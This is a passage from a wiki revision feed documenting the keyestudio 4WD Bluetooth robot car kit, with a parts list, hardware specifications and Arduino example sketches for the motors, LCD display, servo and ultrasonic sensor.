    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;DC Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Motor Fixed Part&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Plastic Tire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 40MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 10MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;USB Cable&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Jumper Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;30&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*6MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;60&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*8MM Flat Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*30MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3MM Nut&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Black)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Red)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Winding Wire (12CM)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Assembly ==&lt;br /&gt;
&lt;br /&gt;
Follow the User Manual. If something is unclear then watch a assembly video. Be careful when installing the motors, make sure they’re all properly aligned, if not the car will pull to one side.&lt;br /&gt;
Especially take care that no cables sticks into the motors.&lt;br /&gt;
&lt;br /&gt;
== Motor control ==&lt;br /&gt;
We control the motor using a H-Bridge L298N Motor Driver. Use a exxternal 5V logic supply when using more than 12V driving voltage.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver.png|500px]]&lt;br /&gt;
&lt;br /&gt;
In our case we need to plug two motors to each motorA and motorB. Connect the power from the battery pack VSS and GND.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver_schematics.png|500px]]&lt;br /&gt;
&lt;br /&gt;
Wire the motor to the Arduino/Sensor Shield as adviced in the user manual.&lt;br /&gt;
&lt;br /&gt;
=== Specification: ===&lt;br /&gt;
* Working Mode: H bridge (double lines)&lt;br /&gt;
* Control Chip: L298N (ST)&lt;br /&gt;
* Logical Voltage: 5V&lt;br /&gt;
* Driving Voltage: 5V-35V&lt;br /&gt;
* Logical Current: 0mA-36mA&amp;gt;&lt;br /&gt;
* Driving Current: 2A (MAX single bridge)&lt;br /&gt;
* Storage Temperature: (-20 °C)-(+135 °C)&lt;br /&gt;
* Maximum Power: 25W&lt;br /&gt;
* Weight: 30g&lt;br /&gt;
* Periphery Dimension: 43 x 43 x 27 mm(L x W x H)&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Initiation ====&lt;br /&gt;
 //define the output pins.&lt;br /&gt;
 int IN1=5;&lt;br /&gt;
 int IN2=6;&lt;br /&gt;
 int IN3=7;&lt;br /&gt;
 int IN4=8;&lt;br /&gt;
 int ENA=9;&lt;br /&gt;
 int ENB=10;&lt;br /&gt;
 void setup() {&lt;br /&gt;
   //set up the pins to act as output.&lt;br /&gt;
   for (int i = 5; i &amp;lt; 11;i++)&lt;br /&gt;
   {&lt;br /&gt;
     pinMode(i,OUTPUT);&lt;br /&gt;
   }&lt;br /&gt;
   delay(5000);&lt;br /&gt;
 }&lt;br /&gt;
==== Rotate Counter Clockwise ====  &lt;br /&gt;
&lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Rotate Clockwise ==== &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Forward ====&lt;br /&gt;
&lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Reverse ====&lt;br /&gt;
&lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
  &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Brake ====&lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== I2C Display ==&lt;br /&gt;
The display is controlled with I2C. I am using the Wire and LiquidCrystal_I2C library to control the display.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
&lt;br /&gt;
* I2C Address: 0x27&lt;br /&gt;
* Back Lit (Blue with white char color)&lt;br /&gt;
* Supply Voltage: 5V&lt;br /&gt;
* Interface:I2C/TWI x1,Gadgeteer interface x2&lt;br /&gt;
* Adjustable Contrast&lt;br /&gt;
* Size:82x35x18 mm&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:I2C_Display_Schematics.png|800px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&amp;lt;div style=&amp;quot;border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Note&amp;lt;/b&amp;gt;: Don&#039;t use the library link that is in the manual, it contains a bug where only the first character of the strings is displayed on the I2C display. Download the latest version from https://www.arduinolibraries.info/libraries/liquid-crystal-i2-c.&lt;br /&gt;
&amp;lt;/div&amp;gt; &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 //set the LCD address to 0x27 for a 16 chars and 2 line display&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,16,2);&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
  //initialize the lcd&lt;br /&gt;
  lcd.init();&lt;br /&gt;
  //enable the backlight &lt;br /&gt;
  lcd.backlight();&lt;br /&gt;
  //set the cursor to the first line.&lt;br /&gt;
  lcd.setCursor(3,0);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;Hello&amp;quot;);&lt;br /&gt;
  //set the cursor in the next line.&lt;br /&gt;
  lcd.setCursor(3,1);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;world!&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {}&lt;br /&gt;
&lt;br /&gt;
== Servo Motor ==&lt;br /&gt;
The Servo Motor is controlled with PWM. The Sketch rotates the motor in an angle between 110 and 180 degres.&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Servo_Motor_Schematics.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 int servopin=2;// select digital pin 9 for servomotor signal line&lt;br /&gt;
 int myangle;// initialize angle variable&lt;br /&gt;
 int pulsewidth;// initialize width variable&lt;br /&gt;
 int val;&lt;br /&gt;
 &lt;br /&gt;
 void servopulse(int servopin,int myangle)// define a servo pulse function&lt;br /&gt;
 {&lt;br /&gt;
   pulsewidth=(myangle*11)+500;// convert angle to 500-2480 pulse width&lt;br /&gt;
   digitalWrite(servopin,HIGH);// set the level of servo pin as “high”&lt;br /&gt;
   delayMicroseconds(pulsewidth);// delay microsecond of pulse width&lt;br /&gt;
   digitalWrite(servopin,LOW);// set the level of servo pin as “low”&lt;br /&gt;
   delay(20-pulsewidth/1000);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
   pinMode(servopin,OUTPUT);// set servo pin as “output”&lt;br /&gt;
   Serial.begin(9600);// connect to serial port, set baud rate at “9600”&lt;br /&gt;
   Serial.println(&amp;quot;ready&amp;quot; ) ;&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop(){&lt;br /&gt;
   val = 180;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
   val = 110;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Ultra Sonic Sensor ==&lt;br /&gt;
I used the pins: echoPin 3 and trigPin 4 because 7 and 8 is already taken by the motordriver.&lt;br /&gt;
If you don&#039;t understand the line: distance = duration/58.3;.&lt;br /&gt;
The speed of sound is 343 m/s. We messure the round trip so we need to divide the 343 with 2 which gives us 171.5 m/s. But we don’t want to deal with meters and seconds we want centimeters and microseconds. 17150 cm/s = 0.017150 cm/us = 1cm/58.3 us.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Working Voltage: DC 5V&lt;br /&gt;
* Working Current: 15mA&lt;br /&gt;
* Working Frequency: 40Hz&lt;br /&gt;
* Max Range: 4m&lt;br /&gt;
* Min Range: 2cm&lt;br /&gt;
* Measuring Angle: 15 degree&lt;br /&gt;
* Trigger Input Signal: 10µS TTL pulse&lt;br /&gt;
* Echo Output Signal Input TTL lever signal and the range in proportion&lt;br /&gt;
* Size: 46*20.4mm&lt;br /&gt;
* Weight: 9g&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Ultra_Sonic_Schematics.png|650px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 #define echoPin 7 // Echo Pin&lt;br /&gt;
 #define trigPin 8 // Trigger Pin&lt;br /&gt;
 #define LEDPin 13 // Onboard LED&lt;br /&gt;
 &lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 &lt;br /&gt;
 void setup() {&lt;br /&gt;
  Serial.begin (9600);&lt;br /&gt;
  pinMode(trigPin, OUTPUT);&lt;br /&gt;
  pinMode(echoPin, INPUT);&lt;br /&gt;
  pinMode(LEDPin, OUTPUT); // Use LED indicator (if required)&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop() {&lt;br /&gt;
 /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
  distance of the nearest object by bouncing soundwaves off of it. */ &lt;br /&gt;
  digitalWrite(trigPin, LOW); &lt;br /&gt;
  delayMicroseconds(2); &lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(trigPin, HIGH);&lt;br /&gt;
  delayMicroseconds(10); &lt;br /&gt;
  digitalWrite(trigPin, LOW);&lt;br /&gt;
  duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
  &lt;br /&gt;
  //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
  distance = duration/58.3;&lt;br /&gt;
 &lt;br /&gt;
  if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange){&lt;br /&gt;
   /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
   to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
   Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
   digitalWrite(LEDPin, HIGH); &lt;br /&gt;
  }&lt;br /&gt;
  else {&lt;br /&gt;
   /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
   turn LED OFF to indicate successful reading. */&lt;br /&gt;
   Serial.println(distance);&lt;br /&gt;
   digitalWrite(LEDPin, LOW); &lt;br /&gt;
  } &lt;br /&gt;
  //Delay 50ms before next reading.&lt;br /&gt;
  delay(50);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Line Tracking Sensor ==&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: +5V&lt;br /&gt;
* Operating Current: &amp;lt;10mA&lt;br /&gt;
* Operating Temperature Range: 0°C ~ + 50°C&lt;br /&gt;
* Output Interface: 3-wire interface (1 - signal, 2 - power, 3 - power supply negative)&lt;br /&gt;
* Output Level: TTL level&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Line_Tracking_Sensor_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Digital IR Receiver Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: 5V&lt;br /&gt;
* Interface: Digital&lt;br /&gt;
* Modulate Frequency: 38kHz&lt;br /&gt;
* Module Interface Socket: JST PH2.0&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:IR_Receiver_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
== Bluetooth Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Bluetooth Protocol: Bluetooth 2.1+ EDR Standard&lt;br /&gt;
* USB Protocol: USB v1.1/2.0&lt;br /&gt;
* Operating Frequency: 2.4GHz ISM Frequency Band&lt;br /&gt;
* Modulation Mode: Gauss Frequency Shift Keying&lt;br /&gt;
* Transmit Power: ≤ 4dBm, Second Stage&lt;br /&gt;
* Sensitivity: ≤-84dBm at 0.1% Bit Error Rate&lt;br /&gt;
* Transmission Speed: 2.1Mbps(Max)/160 kbps(Asynchronous)； 1Mbps/1Mbps(Synchronous)&lt;br /&gt;
* Safety Feature: Authentication and Encryption&lt;br /&gt;
* Supported Configuration: Bluetooth Serial Port (major and minor)&lt;br /&gt;
* Supply Voltage: 5V DC 50mA &lt;br /&gt;
* Operating Temperature: -20 to 55℃&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Bluetooth_Module_Schematics.png|600px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Smart Robot Car Kit Bluetooth 4WD keyestudio]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wiki.keyestudio.com/Ks0192_keyestudio_4WD_Bluetooth_Multi-functional_Car&lt;br /&gt;
* https://www.youtube.com/watch?v=GAqvzCXEUSw&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5997</id>
		<title>Keyestudio 4WD Bluetooth multifunctional car kit</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Keyestudio_4WD_Bluetooth_multifunctional_car_kit&amp;diff=5997"/>
		<updated>2021-02-19T14:21:18Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Rotate Counter Clockwise */ Wrong method name&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the keyestudio 4WD Bluetooth Multi-functional Car Kit. The documentation contains schematics, tipps and code for the car. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Arduino IDE&lt;br /&gt;
* 18650 Batteries (not included in kit)&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
=== Component list ===&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Product Name&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;Quantity&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio UNO R3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Shield V5&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio L298N Motor Shield&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Bluetooh HC-06&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;I2C 1602 LCD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Line Tracking Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;HC-SR04 Ultrasonic Sensor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;keyestudio Digital IR Receiver Module&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4WD Top PCB&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
